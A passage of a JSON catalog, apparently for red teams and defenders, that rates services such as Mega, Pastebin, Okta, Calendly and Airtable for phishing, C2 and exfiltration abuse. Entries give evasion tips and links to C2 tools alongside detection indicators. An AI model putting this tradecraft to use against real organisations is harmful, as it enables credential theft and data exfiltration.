    "banNotes": "Signing request emails almost never flagged. Developer account straightforward",
    "verification": "Email. Developer account free. CC for paid plans",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "trial",
      "devAccount": true,
      "trialDays": 30,
      "limits": "Developer: 5 envelopes/mo free \u00b7 Pro trial 30 days"
    },
    "sso": {
      "saml": true,
      "oidc": true,
      "scim": true,
      "oauth": true,
      "mfa": true,
      "notes": "SAML/OIDC/SCIM on all plans \u00b7 OAuth for API"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1566.002",
      "T1598.003"
    ],
    "refs": [
      {
        "title": "DocuSign Developer",
        "url": "https://developers.docusign.com/"
      },
      {
        "title": "DocuSign Pricing",
        "url": "https://www.docusign.com/products-and-pricing"
      },
      {
        "title": "DocuSign SSO",
        "url": "https://support.docusign.com/s/articles/How-to-configure-SSO-for-DocuSign"
      }
    ],
    "detection": [
      "*.docusign.com",
      "*.docusign.net",
      "app.docusign.com",
      "na2.docusign.net",
      "na3.docusign.net",
      "na4.docusign.net",
      "eu.docusign.net",
      "au.docusign.net",
      "demo.docusign.net",
      "account-d.docusign.com",
      "Envelopes API abuse: POST /restapi/v2.1/accounts/*/envelopes (fake invoice generation)",
      "Spoofed sender: dse_na*.docusign.net vs legitimate docusign.net",
      "Legitimate emails contain 32-char security code - absence is phishing indicator",
      "Maestro workflow notifications abused for fake invoice scams (DocuSign trust alert 2025)"
    ],
    "notes": "Signing request emails are NEVER blocked by email security. Developer account gives free API access for programmatic phishing. Universally trusted brand for BEC",
    "customDomain": false,
    "customDomainNotes": "N/A - e-signature",
    "dataRetention": "Permanent (envelopes)",
    "rateLimits": "API: 1000 calls/hr",
    "maxFileSize": "25MB per document",
    "logging": "Admin audit trail on Business+"
  },
  {
    "name": "Mega",
    "url": "https://mega.nz",
    "category": "Storage",
    "provider": "Mega",
    "signup": "email",
    "signupTime": "~2min",
    "domains": [
      "mega.nz"
    ],
    "trustedDomain": false,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 0,
      "exfil": 1,
      "payload": 1,
      "creds": 0
    },
    "apiEndpoints": [],
    "opsec": "low",
    "opsecNotes": "E2E encrypted by default - DLP cannot inspect content. MEGAcmd for automated CLI exfil. rclone compatible",
    "socDetection": "likely",
    "banRisk": "low",
    "banNotes": "E2E encrypted - Mega cannot inspect content. Minimal enforcement",
    "verification": "Email only. No CC for free",
    "trust": "low",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": false,
      "trialDays": null,
      "limits": "20GB storage (decays) \u00b7 E2E encrypted \u00b7 5GB/day transfer limit \u00b7 MEGAcmd CLI free"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": false,
      "mfa": true,
      "notes": "No SSO \u00b7 MFA via TOTP \u00b7 E2E encryption by default"
    },
    "knownC2": [],
    "exfilTools": [
      {
        "name": "MEGAcmd",
        "url": "https://lolexfil.github.io/#tool=MegaSync%20/%20MEGA%20CLI",
        "note": ""
      },
      {
        "name": "rclone",
        "url": "https://lolexfil.github.io/#tool=rclone",
        "note": ""
      }
    ],
    "mitre": [
      "T1567.002",
      "T1048"
    ],
    "refs": [
      {
        "title": "Mega Pricing",
        "url": "https://mega.io/pricing"
      },
      {
        "title": "MEGAcmd Docs",
        "url": "https://github.com/meganz/MEGAcmd/blob/master/UserGuide.md"
      },
      {
        "title": "lolexfil",
        "url": "https://lolexfil.github.io"
      }
    ],
    "detection": [
      "mega.nz",
      "mega.io",
      "mega.co.nz",
      "api.mega.co.nz",
      "g.api.mega.co.nz",
      "*.userstorage.mega.co.nz",
      "Sigma rule: net_connection_win_domain_mega_nz (Florian Roth)",
      "Sigma rule: dns_query_win_mega_nz (upload subdomain detection)",
      "Process: MEGAsync.exe or megacmd.exe (often renamed by ransomware actors)",
      "Process: rclone.exe with mega: remote config (Conti, World Leaks, etc.)",
      "Non-browser process connecting to mega.co.nz = high confidence exfil indicator",
      "T1567.002: Exfiltration to Cloud Storage (MITRE)",
      "Mandiant: Russian APTs use mega.nz for payload hosting"
    ],
    "notes": "E2E encrypted storage defeats DLP inspection. 20GB free. MEGAcmd + rclone for automated exfil. Encryption is the key advantage over other cloud storage",
    "customDomain": false,
    "customDomainNotes": "N/A - encrypted storage",
    "dataRetention": "Permanent (20GB free, decays)",
    "rateLimits": "API: rate limited",
    "maxFileSize": "No per-file limit (up to storage quota)",
    "logging": "E2E encrypted - Mega cannot audit content"
  },
  {
    "name": "WeTransfer",
    "url": "https://wetransfer.com",
    "category": "Storage",
    "provider": "WeTransfer",
    "signup": "none",
    "signupTime": "0",
    "domains": [
      "wetransfer.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 0,
      "exfil": 1,
      "payload": 1,
      "creds": 0
    },
    "apiEndpoints": [],
    "opsec": "low",
    "opsecNotes": "NO ACCOUNT needed. Trusted email notifications for payload delivery. 2GB transfers",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "No account needed. Files auto-expire. Minimal content scanning",
    "verification": "No signup required",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": false,
      "trialDays": null,
      "limits": "2GB per transfer \u00b7 No account \u00b7 Files expire 7 days \u00b7 Trusted email notifications"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": false,
      "mfa": false,
      "notes": "No auth required"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1567.002",
      "T1566.002"
    ],
    "refs": [
      {
        "title": "WeTransfer",
        "url": "https://wetransfer.com/"
      }
    ],
    "detection": [
      "wetransfer.com",
      "*.wetransfer.com",
      "we.tl",
      "storageow.wetransfer.com",
      "prod-stor-we.wetransfer.net",
      "Phishing: spoofed WeTransfer 'download your files' notification emails",
      "Large outbound uploads to wetransfer.com (exfil indicator)"
    ],
    "notes": "Zero signup required. Payload delivery via trusted WeTransfer email notifications. 2GB transfers. Files auto-expire in 7 days for OPSEC",
    "customDomain": false,
    "customDomainNotes": "N/A - file transfer",
    "dataRetention": "7 days expiry (free)",
    "rateLimits": "No API on free",
    "maxFileSize": "2GB per transfer free",
    "logging": "No audit logs. Transfers auto-delete"
  },
  {
    "name": "GoFile",
    "url": "https://gofile.io",
    "category": "Storage",
    "provider": "GoFile",
    "signup": "none",
    "signupTime": "0",
    "domains": [
      "*.gofile.io"
    ],
    "trustedDomain": false,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 0,
      "exfil": 1,
      "payload": 1,
      "creds": 0
    },
    "apiEndpoints": [
      "api.gofile.io/*"
    ],
    "opsec": "low",
    "opsecNotes": "NO ACCOUNT needed. Anonymous uploads. API available. Direct download links",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Anonymous uploads. Minimal moderation",
    "verification": "No signup required",
    "trust": "low",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": false,
      "trialDays": null,
      "limits": "No limits \u00b7 No account \u00b7 Anonymous \u00b7 API available \u00b7 Direct links"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": false,
      "mfa": false,
      "notes": "No auth required"
    },
    "knownC2": [],
    "exfilTools": [
      {
        "name": "GoFile.io CLI",
        "url": "https://lolexfil.github.io/#tool=GoFile.io",
        "note": ""
      }
    ],
    "mitre": [
      "T1567.002",
      "T1105"
    ],
    "refs": [
      {
        "title": "GoFile API",
        "url": "https://gofile.io/api"
      }
    ],
    "detection": [
      "gofile.io",
      "*.gofile.io",
      "store*.gofile.io",
      "api.gofile.io",
      "api.gofile.io/createFolder",
      "api.gofile.io/uploadFile",
      "Malware staging: gofile.io/d/* download links in phishing payloads"
    ],
    "notes": "Zero signup, anonymous file uploads. API for automation. Direct download links. curl one-liner for quick exfil staging",
    "customDomain": false,
    "customDomainNotes": "N/A - file hosting",
    "dataRetention": "Files expire if inactive",
    "rateLimits": "API available, rate limited",
    "maxFileSize": "No per-file limit stated",
    "logging": "No audit logs"
  },
  {
    "name": "Pastebin",
    "url": "https://pastebin.com",
    "category": "Paste",
    "provider": "Pastebin",
    "signup": "none",
    "signupTime": "0",
    "domains": [
      "pastebin.com"
    ],
    "trustedDomain": false,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 0,
      "c2": 1,
      "exfil": 1,
      "payload": 1,
      "creds": 0
    },
    "apiEndpoints": [
      "pastebin.com/api/*",
      "pastebin.com/raw/*"
    ],
    "opsec": "high",
    "opsecNotes": "Heavily monitored by SOCs and threat intel feeds. Consider rentry.co, paste.ee or Notion pages as alternatives. 2 known C2 frameworks",
    "socDetection": "likely",
    "banRisk": "medium",
    "banNotes": "Well-known to threat intel. Pastebin Pro accounts have been banned for C2",
    "verification": "Optional account. Pro requires email",
    "trust": "none",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": false,
      "trialDays": null,
      "limits": "Free \u00b7 10 pastes/day guest \u00b7 Pro for unlimited \u00b7 API available"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": false,
      "mfa": false,
      "notes": "No auth for posting"
    },
    "knownC2": [
      {
        "name": "AgentSmith",
        "url": "https://github.com/3ndG4me/AgentSmith"
      },
      {
        "name": "Pastebad-Reverse-Shell",
        "url": "https://github.com/PeterEdtu/Pastebad-Reverse-Shell"
      }
    ],
    "exfilTools": [
      {
        "name": "text dump services",
        "url": "https://lolexfil.github.io/#tool=Pastebin%20/%20text%20dump%20services",
        "note": ""
      }
    ],
    "mitre": [
      "T1102.002",
      "T1567.002",
      "T1105"
    ],
    "refs": [
      {
        "title": "Pastebin API",
        "url": "https://pastebin.com/doc_api"
      },
      {
        "title": "lolc2 - Pastebin",
        "url": "https://lolc2.github.io"
      },
      {
        "title": "Check Point: Malware Using Pastebin Clones for C2",
        "url": "https://research.checkpoint.com/2025/from-trust-to-threat-hijacked-discord-invites-used-for-multi-stage-malware-delivery/"
      }
    ],
    "detection": [
      "pastebin.com/api/*",
      "pastebin.com/raw/*",
      "pastebin.com/rw/*"
    ],
    "notes": "2 lolc2 C2 frameworks. HIGH OPSEC RISK - pastebin.com/raw/* is in every threat intel feed. Use rentry.co, paste.ee, or Notion pages instead. Used as C2 dead drop alongside Discord in multi-stage malware delivery campaigns (Check Point 2025). Pastebin clones (paste.ee, rentry.co) increasingly preferred to avoid Pastebin's threat intel monitoring",
    "customDomain": false,
    "customDomainNotes": "N/A - paste service",
    "dataRetention": "Configurable (never to 1 day)",
    "rateLimits": "API: 1 paste/10min free. 250/day Pro",
    "maxFileSize": "512KB per paste free",
    "logging": "Public pastes indexed by search engines",
    "lolc2Url": "https://lolc2.github.io/#pastebin"
  },
  {
    "name": "Okta",
    "url": "https://okta.com",
    "category": "SSO Target",
    "provider": "Okta",
    "signup": "trial",
    "signupTime": "~5min",
    "domains": [
      "*.okta.com",
      "*.oktapreview.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 0,
      "exfil": 0,
      "payload": 0,
      "creds": 1
    },
    "apiEndpoints": [
      "*.okta.com/api/v1/*"
    ],
    "opsec": "low",
    "opsecNotes": "Free developer account. Test SAML manipulation, MFA push fatigue, session hijacking",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Developer account is legitimate. Testing SSO is normal activity",
    "verification": "Email for developer signup. Free tier available",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Developer: 100 MAU free \u00b7 5 OIDC apps \u00b7 SAML included \u00b7 API unlimited"
    },
    "sso": {
      "saml": true,
      "oidc": true,
      "scim": true,
      "oauth": true,
      "mfa": true,
      "notes": "Full IdP: SAML 2.0 \u00b7 OIDC \u00b7 SCIM \u00b7 OAuth 2.0 \u00b7 MFA push/TOTP/WebAuthn"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1556.007",
      "T1550.001",
      "T1621"
    ],
    "refs": [
      {
        "title": "Okta Developer Signup",
        "url": "https://developer.okta.com/signup/"
      },
      {
        "title": "Okta Pricing",
        "url": "https://www.okta.com/pricing/"
      },
      {
        "title": "Okta SAML Docs",
        "url": "https://developer.okta.com/docs/concepts/saml/"
      }
    ],
    "detection": [
      "*.okta.com",
      "*.oktapreview.com",
      "*.okta-emea.com",
      "login.okta.com",
      "*.okta.com/api/v1/*",
      "*.okta.com/oauth2/*",
      "*.okta.com/app/*/sso/saml",
      "Okta System Log: user.session.start from unusual IP/geo",
      "Okta System Log: policy.evaluate_sign_on failures",
      "Okta System Log: user.mfa.factor.deactivate (MFA fatigue/reset)",
      "Okta System Log: user.account.reset_password (credential theft follow-up)",
      "Scattered Spider TTPs: Okta admin impersonation via IT helpdesk social engineering"
    ],
    "notes": "Free developer account for testing SSO attacks: SAML assertion manipulation, MFA push fatigue, session hijacking, org takeover. Full IdP with all auth protocols",
    "customDomain": true,
    "customDomainNotes": "Custom domains on paid plans",
    "dataRetention": "Permanent (config)",
    "rateLimits": "API: 600 req/min",
    "maxFileSize": "N/A",
    "logging": "System Log - detailed audit of all events"
  },
  {
    "name": "Azure AD / Entra ID",
    "url": "https://entra.microsoft.com",
    "category": "SSO Target",
    "provider": "Microsoft",
    "signup": "email",
    "signupTime": "~5min",
    "domains": [
      "login.microsoftonline.com",
      "login.microsoft.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 0,
      "exfil": 0,
      "payload": 0,
      "creds": 1
    },
    "apiEndpoints": [
      "graph.microsoft.com/*",
      "login.microsoftonline.com/*"
    ],
    "opsec": "low",
    "opsecNotes": "Primary target for cloud engagements. Golden SAML, PRT abuse, device code phishing, consent grants",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Dev program is legitimate. Testing your own tenant is allowed",
    "verification": "Email. Dev program free. CC not required",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Entra ID Free: unlimited users \u00b7 P1/P2 trial 30 days \u00b7 M365 dev program free E5"
    },
    "sso": {
      "saml": true,
      "oidc": true,
      "scim": true,
      "oauth": true,
      "mfa": true,
      "notes": "Full IdP: SAML 2.0 \u00b7 OIDC \u00b7 SCIM \u00b7 OAuth 2.0 \u00b7 Conditional Access \u00b7 PRT-based SSO"
    },
    "knownC2": [],
    "exfilTools": [
      {
        "name": "GraphRunner",
        "url": "https://github.com/dafthack/GraphRunner",
        "note": "Post-compromise M365 exfil"
      },
      {
        "name": "AADInternals",
        "url": "https://github.com/Gerenios/AADInternals",
        "note": "Entra ID exploitation toolkit"
      }
    ],
    "mitre": [
      "T1556.007",
      "T1550.001",
      "T1528",
      "T1621",
      "T1078.004"
    ],
    "refs": [
      {
        "title": "Entra ID Pricing",
        "url": "https://www.microsoft.com/en-us/security/business/microsoft-entra-pricing"
      },
      {
        "title": "Entra Free Tier",
        "url": "https://learn.microsoft.com/en-us/entra/fundamentals/free-tenant"
      },
      {
        "title": "M365 Dev Program",
        "url": "https://developer.microsoft.com/en-us/microsoft-365/dev-program"
      }
    ],
    "detection": [
      "login.microsoftonline.com",
      "login.microsoft.com",
      "login.windows.net",
      "graph.microsoft.com",
      "*.onmicrosoft.com",
      "aadcdn.msauth.net",
      "aadcdn.msftauth.net",
      "autologon.microsoftazuread-sso.com",
      "Entra Sign-in Logs: unusual IP, impossible travel, legacy auth protocols",
      "Entra Audit Logs: application consent grants to unknown apps",
      "Entra Audit Logs: new service principal credentials added",
      "Conditional Access: sign-ins bypassing CA policies",
      "Token theft: refresh token replay from new device/IP",
      "Adversary-in-the-Middle: Evilginx2/EvilProxy targeting login.microsoftonline.com"
    ],
    "notes": "Primary target for cloud red team engagements. Golden SAML via STS, PRT abuse, device code phishing, illicit consent grants, pass-the-cookie. M365 Developer Program gives free E5 licenses for testing",
    "customDomain": true,
    "customDomainNotes": "Custom domains verifiable",
    "dataRetention": "Permanent (tenant)",
    "rateLimits": "Graph API: 10k req/10min",
    "maxFileSize": "N/A",
    "logging": "Sign-in logs, Audit logs, Provisioning logs"
  },
  {
    "name": "Loom",
    "url": "https://loom.com",
    "category": "Phishing",
    "provider": "Atlassian",
    "signup": "email",
    "signupTime": "~2min",
    "domains": [
      "loom.com",
      "*.loom.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 0,
      "exfil": 0,
      "payload": 0,
      "creds": 1
    },
    "apiEndpoints": [],
    "opsec": "low",
    "opsecNotes": "Video share notifications are trusted by all email filters. Embed redirect links in video descriptions",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Minimal content moderation on shared videos",
    "verification": "Email only. Google/Slack SSO login. No CC for free",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": false,
      "trialDays": null,
      "limits": "Free: 25 videos, 5min max. Business trial 14 days. Unlimited viewers"
    },
    "sso": {
      "saml": true,
      "oidc": false,
      "scim": true,
      "oauth": true,
      "mfa": true,
      "notes": "SAML/SCIM on Business plan. Part of Atlassian ecosystem since 2023"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1566.002",
      "T1204.001"
    ],
    "refs": [
      {
        "title": "Loom Pricing",
        "url": "https://www.loom.com/pricing"
      }
    ],
    "detection": [
      "*.loom.com",
      "www.loom.com/share/*",
      "www.loom.com/embed/*",
      "cdn.loom.com",
      "loom.com/v/*",
      "Phishing: Loom video links in spearphishing emails as 'video message' pretexts",
      "Loom viewer analytics track who watched (OPSEC risk for targets)"
    ],
    "notes": "Video share notifications bypass all email filters. 'Watch my quick video update' is an extremely effective phishing pretext. Trusted Atlassian-owned domain since 2023 acquisition",
    "customDomain": false,
    "customDomainNotes": "N/A - video messaging",
    "dataRetention": "Permanent (25 videos free)",
    "rateLimits": "No public API limits",
    "maxFileSize": "5min per video free",
    "logging": "Viewer analytics (who watched, when)"
  },
  {
    "name": "Calendly",
    "url": "https://calendly.com",
    "category": "Phishing",
    "provider": "Calendly",
    "signup": "email",
    "signupTime": "~2min",
    "domains": [
      "calendly.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 0,
      "exfil": 0,
      "payload": 0,
      "creds": 1
    },
    "apiEndpoints": [
      "calendly.com/api/v1/*"
    ],
    "opsec": "low",
    "opsecNotes": "Scheduling links are trusted everywhere. Embed credential harvesting in pre-meeting forms",
    "socDetection": "likely",
    "banRisk": "low",
    "banNotes": "Scheduling links rarely flagged. Custom questions in booking forms",
    "verification": "Email only. Google/Microsoft SSO. No CC for free",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free: 1 event type, unlimited bookings. API available. Pro trial 14 days"
    },
    "sso": {
      "saml": true,
      "oidc": false,
      "scim": true,
      "oauth": true,
      "mfa": true,
      "notes": "SAML/SCIM on Enterprise. OAuth for API"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1566.002",
      "T1598.003"
    ],
    "refs": [
      {
        "title": "Calendly Pricing",
        "url": "https://calendly.com/pricing"
      }
    ],
    "detection": [
      "calendly.com",
      "*.calendly.com",
      "calendly.com/api/*",
      "calendly.com/*/invitees",
      "Phishing: Calendly event links as meeting pretexts in spearphishing",
      "Calendly form submissions used for credential/data collection"
    ],
    "notes": "Scheduling links are universally trusted. Custom pre-meeting questions for credential harvesting. Redirect after booking for payload delivery. Mentioned in lolc2 candidates issue #6",
    "customDomain": false,
    "customDomainNotes": "N/A - scheduling",
    "dataRetention": "Permanent",
    "rateLimits": "API: rate limited",
    "maxFileSize": "N/A",
    "logging": "Invitee tracking, form submissions logged"
  },
  {
    "name": "Airtable",
    "url": "https://airtable.com",
    "category": "C2 Channel",
    "provider": "Airtable",
    "signup": "email",
    "signupTime": "~2min",
    "domains": [
      "airtable.com",
      "api.airtable.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 1,
      "exfil": 1,
      "payload": 0,
      "creds": 0
    },
    "apiEndpoints": [
      "api.airtable.com/v0/*"
    ],
    "opsec": "low",
    "opsecNotes": "Database API for C2 dead drops. Records as commands, attachments for file transfer. Enterprise trusted",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "API usage blends with legitimate automation. Minimal content moderation",
    "verification": "Email only. Google/SSO login. No CC for free",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free: 1000 records/base, 1GB attachments, API 5 req/sec. Pro trial available"
    },
    "sso": {
      "saml": true,
      "oidc": false,
      "scim": true,
      "oauth": true,
      "mfa": true,
      "notes": "SAML/SCIM on Enterprise. OAuth for API. Personal access tokens"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1102.002",
      "T1567.002"
    ],
    "refs": [
      {
        "title": "Airtable Pricing",
        "url": "https://airtable.com/pricing"
      },
      {
        "title": "Airtable API",
        "url": "https://airtable.com/developers/web/api/introduction"
      }
    ],
    "detection": [
      "api.airtable.com/v0/*"
    ],
    "notes": "Database-as-C2: table records for commands, attachment fields for file transfer. API rate limit 5 req/sec. Mentioned in lolc2 candidates issue #6. Enterprise trusted domain",
    "customDomain": false,
    "customDomainNotes": "N/A - database platform",
    "dataRetention": "Permanent (1000 records/base free)",
    "rateLimits": "API: 5 req/s",
    "maxFileSize": "5MB per attachment free",
    "logging": "Audit log on Enterprise"
  },
  {
    "name": "Azure DevOps",
    "url": "https://dev.azure.com",
    "category": "DevOps",
    "provider": "Microsoft",
    "signup": "email",
    "signupTime": "~5min",
    "domains": [
      "dev.azure.com",
      "*.visualstudio.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 1,
      "exfil": 1,
      "payload": 1,
      "creds": 0
    },
    "apiEndpoints": [
      "dev.azure.com/*/api/*",
      "*.visualstudio.com/_apis/*"
    ],
    "opsec": "low",
    "opsecNotes": "Pipelines for automated payload delivery. Repos for staging. Artifacts for exfil. Trusted Microsoft domain",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Pentest on own org allowed. *.visualstudio.com universally trusted",
    "verification": "Microsoft account. Free tier available. No CC required",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free: 5 users, 2GB artifacts, 1 parallel CI/CD job, unlimited private repos"
    },
    "sso": {
      "saml": true,
      "oidc": true,
      "scim": true,
      "oauth": true,
      "mfa": true,
      "notes": "Full Entra ID SAML/OIDC/SCIM. PAT tokens for API"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1567.001",
      "T1583.006",
      "T1105"
    ],
    "refs": [
      {
        "title": "Azure DevOps Pricing",
        "url": "https://azure.microsoft.com/en-us/pricing/details/devops/azure-devops-services/"
      }
    ],
    "detection": [
      "dev.azure.com/*/api/*",
      "*.visualstudio.com/_apis/*"
    ],
    "notes": "Trusted Microsoft domain. Pipelines for automated C2 infra deployment. Git repos for payload staging. Artifacts for exfil. *.visualstudio.com whitelisted everywhere",
    "customDomain": true,
    "customDomainNotes": "Custom domains not available. Uses dev.azure.com and *.visualstudio.com",
    "dataRetention": "Permanent (2GB artifacts free)",
    "rateLimits": "API: rate limited per user",
    "maxFileSize": "No per-file limit stated. 2GB artifacts",
    "logging": "Audit logs available. Pipeline logs detailed"
  },
  {
    "name": "Twilio",
    "url": "https://twilio.com",
    "category": "Email",
    "provider": "Twilio",
    "signup": "email",
    "signupTime": "~5min",
    "domains": [
      "api.twilio.com"
    ],
    "trustedDomain": true,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 0,
      "exfil": 0,
      "payload": 0,
      "creds": 1
    },
    "apiEndpoints": [
      "api.twilio.com/2010-04-01/*"
    ],
    "opsec": "medium",
    "opsecNotes": "SMS/voice API for vishing and smishing campaigns. Trial messages include 'Sent from Twilio trial' prefix",
    "socDetection": "unlikely",
    "banRisk": "medium",
    "banNotes": "Twilio actively monitors for fraudulent messaging. Trial accounts limited. Identity verification for production",
    "verification": "Email + phone. CC for upgrade. Identity verification for production messaging. Trial has 'Sent from Twilio' prefix",
    "trust": "high",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "trial",
      "devAccount": true,
      "trialDays": null,
      "limits": "Trial: $15 credit, verified numbers only, 'Sent from Twilio trial' prefix. Production requires identity verify"
    },
    "sso": {
      "saml": true,
      "oidc": false,
      "scim": true,
      "oauth": true,
      "mfa": true,
      "notes": "SAML/SCIM on Enterprise. API key + auth token"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1566.001",
      "T1598.001"
    ],
    "refs": [
      {
        "title": "Twilio Pricing",
        "url": "https://www.twilio.com/en-us/pricing"
      }
    ],
    "detection": [
      "*.twilio.com",
      "api.twilio.com",
      "api.twilio.com/2010-04-01/Accounts/*/Messages.json",
      "*.pstn.twilio.com",
      "event-bridge.twilio.com",
      "taskrouter.twilio.com",
      "SMS originating from Twilio numbers (+1-xxx with Twilio carrier ID)",
      "Smishing: bulk SMS via Twilio API for credential phishing",
      "Twilio SendGrid relay for phishing email delivery"
    ],
    "notes": "SMS/voice API for smishing and vishing. Trial messages prefixed with 'Sent from Twilio trial account'. Production requires identity verification and approved use case. $15 free credit",
    "customDomain": false,
    "customDomainNotes": "N/A - communications API",
    "dataRetention": "Message logs: 400 days",
    "rateLimits": "SMS: 1 msg/s per phone. API: varies",
    "maxFileSize": "N/A",
    "logging": "Event Streams, Debugger, Message Logs"
  },
  {
    "name": "Mailgun",
    "url": "https://mailgun.com",
    "category": "Email",
    "provider": "Sinch",
    "signup": "email+cc",
    "signupTime": "~5min",
    "domains": [
      "api.mailgun.net",
      "*.mailgun.org"
    ],
    "trustedDomain": false,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 0,
      "exfil": 0,
      "payload": 0,
      "creds": 0
    },
    "apiEndpoints": [
      "api.mailgun.net/v3/*"
    ],
    "opsec": "medium",
    "opsecNotes": "Email API. Custom domain support. Requires domain DNS verification for production sending",
    "socDetection": "unlikely",
    "banRisk": "medium",
    "banNotes": "Mailgun monitors sending reputation. Phishing detected via feedback loops. Accounts suspended for abuse",
    "verification": "Email + CC required. Domain DNS verification for production. Sandbox mode initially",
    "trust": "low",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "trial",
      "devAccount": true,
      "trialDays": null,
      "limits": "Trial: 100 emails/day for 30 days on sandbox domain. Custom domain requires DNS verification"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": true,
      "mfa": true,
      "notes": "API key auth. OAuth for integrations"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1566.001",
      "T1585.002"
    ],
    "refs": [
      {
        "title": "Mailgun Pricing",
        "url": "https://www.mailgun.com/pricing/"
      }
    ],
    "detection": [
      "api.mailgun.net",
      "*.mailgun.org",
      "api.mailgun.net/v3/*/messages",
      "api.eu.mailgun.net",
      "*.mg.mailgun.org",
      "smtp.mailgun.org",
      "Bulk email via Mailgun API for phishing delivery",
      "X-Mailgun-* headers in received phishing emails"
    ],
    "notes": "Email API alternative to SendGrid. Sandbox mode allows testing without domain verification. Custom domain support for phishing infrastructure. Requires CC at signup",
    "customDomain": true,
    "customDomainNotes": "Custom sending domains required for production",
    "dataRetention": "Log retention: 5 days free",
    "rateLimits": "Sandbox: 100 emails/day",
    "maxFileSize": "25MB per message",
    "logging": "Logs, Events API, Webhooks for tracking"
  },
  {
    "name": "Render",
    "url": "https://render.com",
    "category": "Cloud",
    "provider": "Render",
    "signup": "email",
    "signupTime": "~3min",
    "domains": [
      "*.onrender.com"
    ],
    "trustedDomain": false,
    "domainFronting": false,
    "domainFrontingNotes": "",
    "abuse": {
      "phishing": 1,
      "c2": 1,
      "exfil": 0,
      "payload": 1,
      "creds": 0
    },
    "apiEndpoints": [],
    "opsec": "low",
    "opsecNotes": "Heroku alternative with actual free tier. Deploy from Git. Custom domains free. Static sites and web services",
    "socDetection": "unlikely",
    "banRisk": "low",
    "banNotes": "Minimal abuse enforcement. Less known than Heroku",
    "verification": "Email or GitHub OAuth. No CC for free tier",
    "trust": "low",
    "lastVerified": "2026-03",
    "freeTier": {
      "type": "free",
      "devAccount": true,
      "trialDays": null,
      "limits": "Free: 750 hours/mo web services (spin down after 15min idle), static sites unlimited, custom domains"
    },
    "sso": {
      "saml": false,
      "oidc": false,
      "scim": false,
      "oauth": true,
      "mfa": true,
      "notes": "GitHub/GitLab OAuth. No enterprise SSO"
    },
    "knownC2": [],
    "exfilTools": [],
    "mitre": [
      "T1583.006",
      "T1102"
    ],
    "refs": [
      {
        "title": "Render Pricing",
        "url": "https://render.com/pricing"
      }
    ],
    "detection": [
      "*.onrender.com",
      "*.render.com",
      "api.render.com",
      "dashboard.render.com",
      "*.web.render.com",
      "Phishing/C2 hosting on *.onrender.com free subdomain",
      "CNAME dangling: Render 'not found' on unclaimed subdomain"
    ],
